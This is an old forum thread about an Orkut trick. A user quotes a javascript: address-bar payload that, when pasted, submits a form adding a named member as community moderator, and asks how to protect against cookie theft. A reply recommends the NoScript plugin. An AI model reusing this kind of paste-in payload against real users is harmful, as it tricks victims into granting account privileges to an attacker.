HELP: Cookie stealing support

Discussion in 'Ethical hacking' started by distroyer, Dec 28, 2007.

  1. distroyer

    distroyer New Member

    Joined:
    Dec 28, 2007
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Hi,

    I was going through a hacked community on orkut which was originaly my frnd's community, in one of the links i found a javascript which if i put in the address bar and press enter, it wld add me as a moderator of any community. Sounds interesting!! But when i suddenly thought cant that be a mis-chief made by someone????? So, i searched into google and found that type of cookie hacking does exist on orkut (pasting such javascript into address bar hacks account).

    The js was like:

    Code:
    [b] 
    
    javascript:a=document.forms[1];a.action="CommMembers.aspx?cmm=34431350&Action.addModerator&
    
    memberId=11520216688680582958";a.submit(); void(0) [/b]
    Now, my question is, if i clear my cookies, for how long will my cookies be sent to the attacker?? or is there any file that is stored in my computer that keeps sending my cookies to the attacker??? how do i get free from if my cookies are hacked?? OR does it send only once
     
  2. pradeep

    pradeep Team Leader

    Joined:
    Apr 4, 2005
    Messages:
    1,645
    Likes Received:
    87
    Trophy Points:
    0
    Occupation:
    Programmer
    Location:
    Kolkata, India
    Home Page:
    http://blog.pradeep.net.in
    Cookies are not sent just like that, the browser has to post them, i.e. there has to be some actions from the user's side. The best safeguard against these kinds of attacks is to use NoScript plugin in firefox, I am unsure of any such plugin for Internet Explorer, try googling in case you are a IE user.
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice